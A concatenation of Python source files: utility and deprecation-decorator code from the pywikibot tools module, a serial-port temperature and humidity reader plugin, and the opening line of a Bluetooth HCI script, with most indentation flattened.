To avoid these issues, it is advisable for the caller to provide their own
container and set the key parameter to be the function L{hash}, or use a
L{weakref} as the key.
The container can be any object that supports __contains__.
If the container is a set or dict, the method add or __setitem__ will be
used automatically. Any other method may be provided explicitly using the
add parameter.
Beware that key=id is only useful for cases where id() is not unique.
Note: This is not thread safe.
@param iterable: the source iterable
@type iterable: collections.abc.Iterable
@param container: storage of seen items
@type container: type
@param key: function to convert the item to a key
@type key: callable
@param add: function to add an item to the container
@type add: callable
"""
if container is None:
container = set()
if not add:
if hasattr(container, 'add'):
def container_add(x):
container.add(key(x) if key else x)
add = container_add
else:
def container_setitem(x):
container.__setitem__(key(x) if key else x,
True)
add = container_setitem
for item in iterable:
try:
if (key(item) if key else item) not in container:
add(item)
yield item
except StopIteration:
return
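# Illustrative sketch (not part of the original module):
#
#     list(filter_unique([3, 1, 3, 2, 1]))          # [3, 1, 2]
#
#     seen = {}                                     # caller-provided container
#     list(filter_unique(['a', 'A', 'a'], container=seen, key=str.lower))
#     # ['a'], and afterwards seen == {'a': True}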
class CombinedError(KeyError, IndexError):
"""An error that gets caught by both KeyError and IndexError."""
class EmptyDefault(str, Mapping):
"""
A default for a not existing siteinfo property.
It should be chosen if there is no better default known. It acts like an
    empty collection, so it can be iterated through safely if treated as a
list, tuple, set or dictionary. It is also basically an empty string.
Accessing a value via __getitem__ will result in a combined KeyError and
IndexError.
"""
def __init__(self):
"""Initialise the default as an empty string."""
str.__init__(self)
def __iter__(self):
"""An iterator which does nothing and drops the argument."""
return empty_iterator()
def __getitem__(self, key):
"""Raise always a L{CombinedError}."""
raise CombinedError(key)
EMPTY_DEFAULT = EmptyDefault()
class SelfCallMixin:
"""
Return self when called.
When '_own_desc' is defined it'll also issue a deprecation warning using
issue_deprecation_warning('Calling ' + _own_desc, 'it directly').
"""
def __call__(self):
"""Do nothing and just return itself."""
if hasattr(self, '_own_desc'):
issue_deprecation_warning('Calling {}'.format(self._own_desc),
'it directly',
warning_class=FutureWarning,
since='20150515')
return self
class SelfCallDict(SelfCallMixin, dict):
"""Dict with SelfCallMixin."""
pass
class SelfCallString(SelfCallMixin, str):
"""String with SelfCallMixin."""
pass
class DequeGenerator(Iterator, collections.deque):
"""A generator that allows items to be added during generating."""
def __next__(self):
"""Iterator method."""
if len(self):
return self.popleft()
else:
raise StopIteration
def open_archive(filename, mode='rb', use_extension=True):
"""
Open a file and uncompress it if needed.
This function supports bzip2, gzip, 7zip, lzma, and xz as compression
containers. It uses the packages available in the standard library for
bzip2, gzip, lzma, and xz so they are always available. 7zip is only
available when a 7za program is available and only supports reading
from it.
The compression is either selected via the magic number or file ending.
@param filename: The filename.
@type filename: str
@param use_extension: Use the file extension instead of the magic number
to determine the type of compression (default True). Must be True when
writing or appending.
@type use_extension: bool
@param mode: The mode in which the file should be opened. It may either be
'r', 'rb', 'a', 'ab', 'w' or 'wb'. All modes open the file in binary
mode. It defaults to 'rb'.
@type mode: str
@raises ValueError: When 7za is not available or the opening mode is
unknown or it tries to write a 7z archive.
@raises FileNotFoundError: When the filename doesn't exist and it tries
to read from it or it tries to determine the compression algorithm.
@raises OSError: When it's not a 7z archive but the file extension is 7z.
It is also raised by bz2 when its content is invalid. gzip does not
immediately raise that error but only on reading it.
@raises lzma.LZMAError: When error occurs during compression or
decompression or when initializing the state with lzma or xz.
@raises ImportError: When file is compressed with bz2 but neither bz2 nor
bz2file is importable, or when file is compressed with lzma or xz but
lzma is not importable.
@return: A file-like object returning the uncompressed data in binary mode.
@rtype: file-like object
"""
# extension_map maps magic_number to extension.
# Unfortunately, legacy LZMA container has no magic number
extension_map = {
b'BZh': 'bz2',
b'\x1F\x8B\x08': 'gz',
b"7z\xBC\xAF'\x1C": '7z',
b'\xFD7zXZ\x00': 'xz',
}
if mode in ('r', 'a', 'w'):
mode += 'b'
elif mode not in ('rb', 'ab', 'wb'):
raise ValueError('Invalid mode: "{}"'.format(mode))
if use_extension:
# if '.' not in filename, it'll be 1 character long but otherwise
# contain the period
extension = filename[filename.rfind('.'):][1:]
else:
if mode != 'rb':
raise ValueError('Magic number detection only when reading')
with open(filename, 'rb') as f:
magic_number = f.read(8)
for pattern in extension_map:
if magic_number.startswith(pattern):
extension = extension_map[pattern]
break
else:
extension = ''
if extension == 'bz2':
if isinstance(bz2, ImportError):
raise bz2
return bz2.BZ2File(filename, mode)
if extension == 'gz':
return gzip.open(filename, mode)
if extension == '7z':
if mode != 'rb':
raise NotImplementedError('It is not possible to write a 7z file.')
try:
process = subprocess.Popen(['7za', 'e', '-bd', '-so', filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=65535)
except OSError:
raise ValueError('7za is not installed or cannot '
'uncompress "{}"'.format(filename))
else:
stderr = process.stderr.read()
process.stderr.close()
if stderr != b'':
process.stdout.close()
raise OSError(
'Unexpected STDERR output from 7za {}'.format(stderr))
return process.stdout
if extension in ('lzma', 'xz'):
if isinstance(lzma, ImportError):
raise lzma
lzma_fmts = {'lzma': lzma.FORMAT_ALONE, 'xz': lzma.FORMAT_XZ}
return lzma.open(filename, mode, format=lzma_fmts[extension])
# assume it's an uncompressed file
return open(filename, 'rb')
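# A minimal usage sketch for open_archive (the file name is hypothetical):
# count the lines of a possibly compressed dump, letting the magic number
# detection described above pick the right decompressor.
def _count_dump_lines_example(path='dump.xml.bz2'):
    """Count lines in a (possibly compressed) file opened via open_archive."""
    with open_archive(path, use_extension=False) as f:
        return sum(1 for _ in f)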
def merge_unique_dicts(*args, **kwargs):
"""
Return a merged dict and make sure that the original dicts keys are unique.
The positional arguments are the dictionaries to be merged. It is also
possible to define an additional dict using the keyword arguments.
"""
args = list(args) + [dict(kwargs)]
conflicts = set()
result = {}
for arg in args:
conflicts |= set(arg.keys()) & set(result.keys())
result.update(arg)
if conflicts:
raise ValueError('Multiple dicts contain the same keys: {}'
.format(', '.join(sorted(str(key)
for key in conflicts))))
return result
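# Illustrative sketch of merge_unique_dicts with made-up values: disjoint keys
# merge fine, while a key occurring twice raises ValueError.
def _merge_unique_dicts_example():
    """Demonstrate the unique-key guarantee of merge_unique_dicts."""
    merged = merge_unique_dicts({'a': 1}, {'b': 2}, c=3)
    assert merged == {'a': 1, 'b': 2, 'c': 3}
    try:
        merge_unique_dicts({'a': 1}, {'a': 2})
    except ValueError:
        pass  # 'a' appears in both dicts, so the conflict is reported
    return merged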
# Decorators
#
# Decorator functions without parameters are _invoked_ differently from
# decorator functions with function syntax. For example, @deprecated causes
# a different invocation to @deprecated().
# The former is invoked with the decorated function as args[0].
# The latter is invoked with the decorator arguments as *args & **kwargs,
# and it must return a callable which will be invoked with the decorated
# function as args[0].
# The following decorators may support both syntaxes, e.g. @deprecated and
# @deprecated() both work. In order to achieve that, the code inspects
# args[0] to see if it is callable. Therefore, a decorator must not accept
# only one argument that is a callable, as it would be detected as a
# decorator invoked without any arguments.
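# A stand-alone sketch (not part of the original API) of the dual-syntax
# detection described above; '_log_call_example' is a made-up decorator that
# works both as @_log_call_example and as @_log_call_example(prefix='...').
def _log_call_example(*dec_args, **dec_kwargs):
    """Toy decorator supporting use with and without parentheses."""
    prefix = dec_kwargs.get('prefix', 'calling')
    def wrap(func):
        def wrapper(*args, **kwargs):
            print(prefix, func.__name__)
            return func(*args, **kwargs)
        return wrapper
    if len(dec_args) == 1 and not dec_kwargs and callable(dec_args[0]):
        return wrap(dec_args[0])  # invoked as @_log_call_example
    return wrap                   # invoked as @_log_call_example(...)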
def add_decorated_full_name(obj, stacklevel=1):
"""Extract full object name, including class, and store in __full_name__.
This must be done on all decorators that are chained together, otherwise
the second decorator will have the wrong full name.
@param obj: An object being decorated
@type obj: object
@param stacklevel: level to use
@type stacklevel: int
"""
if hasattr(obj, '__full_name__'):
return
# The current frame is add_decorated_full_name
# The next frame is the decorator
# The next frame is the object being decorated
frame = sys._getframe(stacklevel + 1)
class_name = frame.f_code.co_name
if class_name and class_name != '<module>':
obj.__full_name__ = '{}.{}.{}'.format(obj.__module__,
class_name, obj.__name__)
else:
obj.__full_name__ = '{}.{}'.format(obj.__module__, obj.__name__)
def manage_wrapping(wrapper, obj):
"""Add attributes to wrapper and wrapped functions."""
wrapper.__doc__ = obj.__doc__
wrapper.__name__ = obj.__name__
wrapper.__module__ = obj.__module__
wrapper.__signature__ = inspect.signature(obj)
if not hasattr(obj, '__full_name__'):
add_decorated_full_name(obj, 2)
wrapper.__full_name__ = obj.__full_name__
# Use the previous wrappers depth, if it exists
wrapper.__depth__ = getattr(obj, '__depth__', 0) + 1
# Obtain the wrapped object from the previous wrapper
wrapped = getattr(obj, '__wrapped__', obj)
wrapper.__wrapped__ = wrapped
# Increment the number of wrappers
if hasattr(wrapped, '__wrappers__'):
wrapped.__wrappers__ += 1
else:
wrapped.__wrappers__ = 1
def get_wrapper_depth(wrapper):
"""Return depth of wrapper function."""
return wrapper.__wrapped__.__wrappers__ + (1 - wrapper.__depth__)
def add_full_name(obj):
"""
A decorator to add __full_name__ to the function being decorated.
This should be done for all decorators used in pywikibot, as any
decorator that does not add __full_name__ will prevent other
decorators in the same chain from being able to obtain it.
This can be used to monkey-patch decorators in other modules.
e.g.
<xyz>.foo = add_full_name(<xyz>.foo)
@param obj: The function to decorate
@type obj: callable
@return: decorating function
@rtype: function
"""
def outer_wrapper(*outer_args, **outer_kwargs):
"""Outer wrapper.
The outer wrapper may be the replacement function if the decorated
decorator was called without arguments, or the replacement decorator
if the decorated decorator was called with arguments.
@param outer_args: args
@param outer_kwargs: kwargs
"""
def inner_wrapper(*args, **kwargs):
"""Replacement function.
If the decorator supported arguments, they are in outer_args,
and this wrapper is used to process the args which belong to
the function that the decorated decorator was decorating.
@param args: args passed to the decorated function.
@param kwargs: kwargs passed to the decorated function.
"""
add_decorated_full_name(args[0])
return obj(*outer_args, **outer_kwargs)(*args, **kwargs)
inner_wrapper.__doc__ = obj.__doc__
inner_wrapper.__name__ = obj.__name__
inner_wrapper.__module__ = obj.__module__
inner_wrapper.__signature__ = inspect.signature(obj)
# The decorator being decorated may have args, so both
# syntaxes need to be supported.
if (len(outer_args) == 1 and not outer_kwargs
and callable(outer_args[0])):
add_decorated_full_name(outer_args[0])
return obj(outer_args[0])
else:
return inner_wrapper
if not __debug__:
return obj
return outer_wrapper
def _build_msg_string(instead, since):
"""Build a deprecation warning message format string."""
if not since:
since = ''
elif '.' in since:
since = ' since release ' + since
else:
year_str = month_str = day_str = ''
days = (datetime.utcnow() - datetime.strptime(since, '%Y%m%d')).days
years = days // 365
days = days % 365
months = days // 30
days = days % 30
if years == 1:
years = 0
months += 12
if years:
year_str = '{} years'.format(years)
else:
day_str = '{} day{}'.format(days, 's' if days != 1 else '')
if months:
month_str = '{} month{}'.format(
months, 's' if months != 1 else '')
if year_str and month_str:
year_str += ' and '
if month_str and day_str:
month_str += ' and '
since = ' for {}{}{}'.format(year_str, month_str, day_str)
if instead:
msg = '{{0}} is deprecated{since}; use {{1}} instead.'
else:
msg = '{{0}} is deprecated{since}.'
return msg.format(since=since)
def issue_deprecation_warning(name: str, instead=None, depth=2,
warning_class=None, since=None):
"""Issue a deprecation warning.
@param name: the name of the deprecated object
@param instead: suggested replacement for the deprecated object
@type instead: str or None
@param depth: depth + 1 will be used as stacklevel for the warnings
@type depth: int
@param warning_class: a warning class (category) to be used, defaults to
DeprecationWarning
@type warning_class: type
@param since: a timestamp string of the date when the method was
deprecated (form 'YYYYMMDD') or a version string.
@type since: str or None
"""
msg = _build_msg_string(instead, since)
if warning_class is None:
warning_class = (DeprecationWarning
if instead else _NotImplementedWarning)
warn(msg.format(name, instead), warning_class, depth + 1)
@add_full_name
def deprecated(*args, **kwargs):
"""Decorator to output a deprecation warning.
@kwarg instead: if provided, will be used to specify the replacement
@type instead: str
@kwarg since: a timestamp string of the date when the method was
deprecated (form 'YYYYMMDD') or a version string.
@type since: str
@kwarg future_warning: if True a FutureWarning will be thrown,
otherwise it defaults to DeprecationWarning
@type future_warning: bool
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*args, **kwargs):
"""Replacement function.
@param args: args passed to the decorated function.
@param kwargs: kwargs passed to the decorated function.
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
issue_deprecation_warning(
name, instead, depth, since=since,
warning_class=FutureWarning if future_warning else None)
return obj(*args, **kwargs)
def add_docstring(wrapper):
"""Add a Deprecated notice to the docstring."""
deprecation_notice = 'Deprecated'
if instead:
deprecation_notice += '; use ' + instead + ' instead'
deprecation_notice += '.\n\n'
if wrapper.__doc__: # Append old docstring after the notice
wrapper.__doc__ = deprecation_notice + wrapper.__doc__
else:
wrapper.__doc__ = deprecation_notice
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
# Regular expression to find existing deprecation notices
deprecated_notice = re.compile(r'(^|\s)DEPRECATED[.:;,]',
re.IGNORECASE)
# Add the deprecation notice to the docstring if not present
if not wrapper.__doc__:
add_docstring(wrapper)
else:
if not deprecated_notice.search(wrapper.__doc__):
add_docstring(wrapper)
else:
# Get docstring up to @params so deprecation notices for
# parameters don't disrupt it
trim_params = re.compile(r'^.*?((?=@param)|$)', re.DOTALL)
trimmed_doc = trim_params.match(wrapper.__doc__).group(0)
if not deprecated_notice.search(trimmed_doc): # No notice
add_docstring(wrapper)
return wrapper
since = kwargs.pop('since', None)
future_warning = kwargs.pop('future_warning', False)
without_parameters = (len(args) == 1 and len(kwargs) == 0
and callable(args[0]))
if 'instead' in kwargs:
instead = kwargs['instead']
elif not without_parameters and len(args) == 1:
instead = args[0]
else:
instead = False
# When called as @deprecated, return a replacement function
if without_parameters:
if not __debug__:
return args[0]
return decorator(args[0])
# Otherwise return a decorator, which returns a replacement function
return decorator
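# Hedged usage sketch for the @deprecated decorator defined above; the names
# and the 'since' date are invented for illustration only.
@deprecated('shiny_new_function', since='20200101')
def _old_function_example():
    """Old function kept only as an example of a deprecation wrapper."""
    return 42
# Calling _old_function_example() emits a DeprecationWarning suggesting
# 'shiny_new_function', because 'instead' was passed positionally.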
def deprecate_arg(old_arg: str, new_arg):
"""Decorator to declare old_arg deprecated and replace it with new_arg.
Usage:
@deprecate_arg('foo', 'bar')
def my_function(bar='baz'): pass
# replaces 'foo' keyword by 'bar' used by my_function
@deprecate_arg('foo', None)
def my_function(): pass
# ignores 'foo' keyword no longer used by my_function
deprecated_args decorator should be used in favour of this
deprecate_arg decorator but it is held to deprecate args which become
a reserved word in future Python releases and to prevent syntax errors.
@param old_arg: old keyword
@param new_arg: new keyword
@type new_arg: str or None or bool
"""
return deprecated_args(**{old_arg: new_arg})
def deprecated_args(**arg_pairs):
"""Decorator to declare multiple args deprecated.
Usage:
@deprecated_args(foo='bar', baz=None)
def my_function(bar='baz'): pass
# replaces 'foo' keyword by 'bar' and ignores 'baz' keyword
@param arg_pairs: Each entry points to the new argument name. If an
argument is to be removed, the value may be one of the following:
- None: shows a DeprecationWarning
- False: shows a PendingDeprecationWarning
- True: shows a FutureWarning (only once)
- empty string: no warning is printed
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@param __kw: kwargs passed to the decorated function
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
for old_arg, new_arg in arg_pairs.items():
output_args = {
'name': name,
'old_arg': old_arg,
'new_arg': new_arg,
}
if old_arg not in __kw:
continue
if new_arg not in [True, False, None, '']:
if new_arg in __kw:
warn('{new_arg} argument of {name} '
'replaces {old_arg}; cannot use both.'
.format_map(output_args),
RuntimeWarning, depth)
else:
# If the value is positionally given this will
# cause a TypeError, which is intentional
warn('{old_arg} argument of {name} '
'is deprecated; use {new_arg} instead.'
.format_map(output_args),
DeprecationWarning, depth)
__kw[new_arg] = __kw[old_arg]
elif new_arg == '':
pass
else:
if new_arg is False:
cls = PendingDeprecationWarning
elif new_arg is True:
cls = FutureWarning
else: # new_arg is None
cls = DeprecationWarning
warn('{old_arg} argument of {name} is deprecated.'
.format_map(output_args),
cls, depth)
del __kw[old_arg]
return obj(*__args, **__kw)
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
if wrapper.__signature__:
# Build a new signature with deprecated args added.
params = collections.OrderedDict()
for param in wrapper.__signature__.parameters.values():
params[param.name] = param.replace()
for old_arg, new_arg in arg_pairs.items():
params[old_arg] = inspect.Parameter(
old_arg, kind=inspect._POSITIONAL_OR_KEYWORD,
default='[deprecated name of {}]'.format(new_arg)
if new_arg not in [True, False, None, '']
else NotImplemented)
params = collections.OrderedDict(sorted(params.items(),
key=lambda x: x[1].kind))
wrapper.__signature__ = inspect.Signature()
wrapper.__signature__._parameters = params
return wrapper
return decorator
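# Hedged usage sketch for @deprecated_args; 'limit' and 'step' are made-up
# parameter names used only to illustrate renaming and dropping of kwargs.
@deprecated_args(limit='total', step=None)
def _fetch_example(total=None):
    """Return 'total'; 'limit' is renamed to 'total', 'step' is dropped."""
    return total
# _fetch_example(limit=5) warns and behaves like _fetch_example(total=5);
# _fetch_example(step=2) warns that 'step' is deprecated and ignores it.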
def remove_last_args(arg_names):
"""
Decorator to declare all args additionally provided deprecated.
All positional arguments appearing after the normal arguments are marked
deprecated. It marks also all keyword arguments present in arg_names as
deprecated. Any arguments (positional or keyword) which are not present in
arg_names are forwarded. For example, a call with 3 parameters where the
original function accepts one and arg_names contains one name will result
in an error, because after dropping the one deprecated argument the
function is still called with 2 parameters.
The decorated function may not use C{*args} or C{**kwargs}.
@param arg_names: The names of all arguments.
@type arg_names: iterable; for the most explanatory message it should
retain the given order (so not a set for example).
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@param __kw: kwargs passed to the decorated function
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
args, varargs, kwargs, *_ = getfullargspec(wrapper.__wrapped__)
if varargs is not None and kwargs is not None:
raise ValueError('{} may not have * or ** args.'
.format(name))
deprecated = set(__kw) & set(arg_names)
if len(__args) > len(args):
deprecated.update(arg_names[:len(__args) - len(args)])
# remove at most |arg_names| entries from the back
new_args = tuple(__args[:max(len(args),
len(__args) - len(arg_names))])
new_kwargs = {arg: val for arg, val in __kw.items()
if arg not in arg_names}
if deprecated:
# sort them according to arg_names
deprecated = [arg for arg in arg_names if arg in deprecated]
warn("The trailing arguments ('{}') of {} are deprecated. "
"The value(s) provided for '{}' have been dropped."
.format("', '".join(arg_names), name,
"', '".join(deprecated)),
DeprecationWarning, depth)
return obj(*new_args, **new_kwargs)
manage_wrapping(wrapper, obj)
return wrapper
return decorator
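# Hedged usage sketch for @remove_last_args; the argument names are invented.
@remove_last_args(['comment', 'minor'])
def _save_example(text):
    """Save 'text'; the former trailing 'comment' and 'minor' args are gone."""
    return text
# _save_example('foo', 'a comment') warns about the deprecated trailing
# argument and forwards only 'foo' to the function body.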
def redirect_func(target, source_module: Optional[str] = None,
target_module: Optional[str] = None,
old_name: Optional[str] = None,
class_name: Optional[str] = None,
since: Optional[str] = None,
future_warning=False):
"""
Return a function which can be used to redirect to 'target'.
It also acts like marking that function deprecated and copies all
parameters.
@param target: The targeted function which is to be executed.
@type target: callable
@param source_module: The module of the old function. If '.' defaults
to target_module. If 'None' (default) it tries to guess it from the
executing function.
@param target_module: The module of the target function. If
'None' (default) it tries to get it from the target. Might not work
with nested classes.
@param old_name: The old function name. If None it uses the name of the
new function.
@param class_name: The name of the class. It's added to the target and
source module (separated by a '.').
@param since: a timestamp string of the date when the method was
deprecated (form 'YYYYMMDD') or a version string.
@param future_warning: if True a FutureWarning will be thrown,
otherwise it defaults to DeprecationWarning
@type future_warning: bool
@return: A new function which adds a warning prior to each execution.
@rtype: callable
"""
def call(*a, **kw):
issue_deprecation_warning(
old_name, new_name, since=since,
warning_class=FutureWarning if future_warning else None)
return target(*a, **kw)
if target_module is None:
target_module = target.__module__
if target_module and target_module[-1] != '.':
target_module += '.'
if source_module == '.':
source_module = target_module
elif source_module and source_module[-1] != '.':
source_module += '.'
else:
source_module = sys._getframe(1).f_globals['__name__'] + '.'
if class_name:
target_module += class_name + '.'
source_module += class_name + '.'
old_name = source_module + (old_name or target.__name__)
new_name = target_module + target.__name__
if not __debug__:
return target
return call
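# Hedged usage sketch for redirect_func; the helper and its old name are
# hypothetical and only illustrate how the redirect is wired up.
def _new_helper_example(value):
    """Current implementation of a hypothetical helper."""
    return value * 2
_old_helper_example = redirect_func(_new_helper_example,
                                    old_name='old_helper_example',
                                    since='20200101')
# _old_helper_example(3) warns that the old name is deprecated in favour of
# the new one and then returns 6.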
class ModuleDeprecationWrapper(types.ModuleType):
"""A wrapper for a module to deprecate classes or variables of it."""
def __init__(self, module):
"""
Initialise the wrapper.
It will automatically overwrite the module with this instance in
C{sys.modules}.
@param module: The module name or instance
@type module: str or module
"""
if isinstance(module, (str, bytes)):
module = sys.modules[module]
super().__setattr__('_deprecated', {})
super().__setattr__('_module', module)
self.__dict__.update(module.__dict__)
if __debug__:
sys.modules[module.__name__] = self
def _add_deprecated_attr(self, name: str, replacement=None,
replacement_name: Optional[str] = None,
warning_message: Optional[str] = None,
since: Optional[str] = None,
future_warning: bool = False):
"""
Add the name to the local deprecated names dict.
@param name: The name of the deprecated class or variable. It may not
be already deprecated.
@param replacement: The replacement value which should be returned
instead. If the name is already an attribute of that module this
must be None. If None it'll return the attribute of the module.
@type replacement: any
@param replacement_name: The name of the new replaced value. Required
if C{replacement} is not None and it has no __name__ attribute.
If it contains a '.', it will be interpreted as a Python dotted
object name, and evaluated when the deprecated object is needed.
@param warning_message: The warning to display, with positional
variables: {0} = module, {1} = attribute name, {2} = replacement.
@param since: a timestamp string of the date when the method was
deprecated (form 'YYYYMMDD') or a version string.
@param future_warning: if True a FutureWarning will be thrown,
otherwise it defaults to DeprecationWarning
"""
if '.' in name:
raise ValueError('Deprecated name "{}" may not contain '
'".".'.format(name))
if name in self._deprecated:
raise ValueError('Name "{}" is already deprecated.'.format(name))
if replacement is not None and hasattr(self._module, name):
raise ValueError('Module has already an attribute named '
'"{}".'.format(name))
if replacement_name is None:
if hasattr(replacement, '__name__'):
replacement_name = replacement.__module__
if hasattr(replacement, '__self__'):
replacement_name += '.'
replacement_name += replacement.__self__.__class__.__name__
replacement_name += '.' + replacement.__name__
else:
raise TypeError('Replacement must have a __name__ attribute '
'or a replacement name must be set '
'specifically.')
if not warning_message:
warning_message = _build_msg_string(
replacement_name, since).format('{0}.{1}', '{2}')
if hasattr(self, name):
# __getattr__ will only be invoked if self.<name> does not exist.
delattr(self, name)
self._deprecated[name] = (
replacement_name, replacement, warning_message, future_warning)
def __setattr__(self, attr, value):
"""Set the value of the wrapped module."""
self.__dict__[attr] = value
setattr(self._module, attr, value)
def __getattr__(self, attr):
"""Return the attribute with a deprecation warning if required."""
if attr in self._deprecated:
name, repl, message, future = self._deprecated[attr]
warning_message = message
warn(warning_message.format(self._module.__name__, attr, name),
FutureWarning if future else DeprecationWarning, 2)
if repl:
return repl
if '.' in name:
with suppress(Exception):
package_name = name.split('.', 1)[0]
module = import_module(package_name)
context = {package_name: module}
replacement = eval(name, context)
self._deprecated[attr] = (
name, replacement, message, future)
return replacement
return getattr(self._module, attr)
def file_mode_checker(filename: str, mode=0o600, quiet=False, create=False):
"""Check file mode and update it, if needed.
@param filename: filename path
@param mode: requested file mode
@type mode: int
@param quiet: warn about file mode change if False.
@type quiet: bool
@param create: create the file if it does not exist already
@type create: bool
@raise IOError: The file does not exist and `create` is False.
"""
try:
st_mode = os.stat(filename).st_mode
except OSError: # file does not exist
if not create:
raise
os.close(os.open(filename, os.O_CREAT | os.O_EXCL, mode))
return
warn_str = 'File {0} had {1:o} mode; converted to {2:o} mode.'
if stat.S_ISREG(st_mode) and (st_mode - stat.S_IFREG != mode):
os.chmod(filename, mode)
# re-read and check changes
if os.stat(filename).st_mode != st_mode and not quiet:
warn(warn_str.format(filename, st_mode - stat.S_IFREG, mode))
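# Minimal usage sketch for file_mode_checker; the path is hypothetical.
def _protect_credentials_example(path='user-password.py'):
    """Ensure the credentials file exists and stays private (mode 0o600)."""
    file_mode_checker(path, mode=0o600, create=True)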
def compute_file_hash(filename: str, sha='sha1', bytes_to_read=None):
"""Compute file hash.
Result is expressed as hexdigest().
@param filename: filename path
@param sha: hashing function among the following in hashlib:
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
function name shall be passed as string, e.g. 'sha1'.
@type sha: str
@param bytes_to_read: only the first bytes_to_read will be considered;
if file size is smaller, the whole file will be considered.
@type bytes_to_read: None or int
"""
size = os.path.getsize(filename)
if bytes_to_read is None:
bytes_to_read = size
else:
bytes_to_read = min(bytes_to_read, size)
step = 1 << 20
shas = ['md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']
assert sha in shas
sha = getattr(hashlib, sha)() # sha instance
with open(filename, 'rb') as f:
while bytes_to_read > 0:
read_bytes = f.read(min(bytes_to_read, step))
assert read_bytes # make sure we actually read bytes
bytes_to_read -= len(read_bytes)
sha.update(read_bytes)
return sha.hexdigest()
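# Minimal usage sketch for compute_file_hash; the file name is hypothetical.
def _quick_fingerprint_example(path='dump.xml'):
    """Hash only the first MiB of a large file for a quick fingerprint."""
    return compute_file_hash(path, sha='sha256', bytes_to_read=1 << 20)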
# deprecated parts ############################################################
@deprecated('bot_choice.Option and its subclasses', since='20181217')
def concat_options(message, line_length, options):
"""DEPRECATED. Concatenate options."""
indent = len(message) + 2
line_length -= indent
option_msg = ''
option_line = ''
for option in options:
if option_line:
option_line += ', '
# +1 for ','
if len(option_line) + len(option) + 1 > line_length:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line[:-1] # remove space
option_line = ''
option_line += option
if option_line:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line
return '{} ({}):'.format(message, option_msg)
def _py2():
"""Function for deprecated PY2 variable used by wrapper below."""
return (PYTHON_VERSION[0] == 2)
wrapper = ModuleDeprecationWrapper(__name__)
wrapper._add_deprecated_attr('FrozenDict', _FrozenDict,
replacement_name='tools.frozenmap',
since='20201109', future_warning=True)
wrapper._add_deprecated_attr('PY2', _py2(),
replacement_name='sys.version_info[0] == 2',
since='20201224', future_warning=True)
|
MAPS_temp_plugin.py
|
# -*- coding: UTF-8 -*-
# mod for temp/RH plugin
import math
import time
import serial
import threading
from datetime import datetime
from collections import deque
from statistics import median
MIC_COM_PORT = '/dev/ttyACM0'
BAUD_RATES = 115200
#pairs = datetime.now().strftime("%Y-%m-%d %H-%M").split(" ")
#time_slot_string = ""
#slot_count = 0
#slot_energy = 0
#Leq = 0
#Leq_Max = 0
#Leq_Min = 0
#Leq_Median = 0
temp_data = 0
rh_data = 0
#notice: we use a sliding window to calculate Max/Min/Mid
# one goes in, one comes out
#dba_windows = deque(maxlen=60)
"""
# how Leq is calculated
- first we have a lot of data in 1 second
ex: dB(A)_t0 = 50 dB ~ dB(A)_tn = 60 dB
- second, do "pow(10,(x/5))" to get the energy of t0
- next, "sum up pow_t0 ~ pow_tn" and calculate "pow_AVG" (depends on how long we want)
- do a "sqrt(pow_AVG)" to get the energy of this time period
- last, calculate "log10(energy_of_t0~tn) * 10" to get the Leq of this time period (dB(A))
"""
"""
def transfer_to_eng(x):
Lf = math.pow(10,(x/5))
return Lf
"""
def get_temp_data():
#global slot_count, slot_energy, Leq, time_slot_string
#global Leq_Max, Leq_Min, Leq_Median, dba_windows
global temp_data,rh_data
while True:
#ser = serial.Serial(MIC_COM_PORT, BAUD_RATES)
try:
ser = serial.Serial(MIC_COM_PORT, BAUD_RATES)
#last_time_stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S").split(" ")[1]
while True:
#time_stamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S").split(" ")[1]
#if(time_stamp == last_time_stamp):
if(1):
while ser.in_waiting:
data_raw = ser.readline()
data = data_raw.decode()
#input data: Temp:24.57,Humidity:51.82
data_set = data.strip().split(",")
#calculate dba to energy
#slot_energy = slot_energy + transfer_to_eng(float(data_set[1]))
temp_data = float(data_set[0].split(":")[1])
rh_data = float(data_set[1].split(":")[1])
#print("------------------")
#print(temp_data)
#print(rh_data)
#print("------------------")
#time_slot_string = time_slot_string + str(data_set[1]) + ","
#slot_count = slot_count + 1
#else:
#transfer back to dba / Leq in 1 seconds
#Leq = math.log10(math.sqrt(slot_energy / slot_count)) * 10
#limited to 2 places
#Leq = round(Leq,2)
#dba_windows.append(Leq)
#Leq_Max = max(dba_windows)
#Leq_Min = min(dba_windows)
#Leq_Median = round(median(dba_windows),2)
#print("Leq: " + str(Leq) + "\n")
#print("------------------")
#print("Leq: " + str(Leq) + "\n")
#print("Leq_Max: " + str(Leq_Max) + "\n")
#print("Leq_Min: " + str(Leq_Min) + "\n")
#print("Leq_Median: " + str(Leq_Median) + "\n")
#print("------------------")
#time_slot_string = ""
#slot_energy = 0
#slot_count = 0
#temp_data = 0
#rh_data = 0
#last_time_stamp = time_stamp
except:
ser.close()
#clear remain data
#dba_windows.clear()
#Leq = 0
#Leq_Max = 0
#Leq_Min = 0
#Leq_Median = 0
temp_data = 0
rh_data = 0
time.sleep(5)
#print('no MIC or port error!\n')
#traceback.print_exc()
#start MIC sensing
get_temp_data_t = threading.Thread(target = get_temp_data)
get_temp_data_t.daemon = True  # setDaemon() is deprecated in newer Python
get_temp_data_t.start()
|
BluetoothHCI.py
|
#!/usr/bin/python
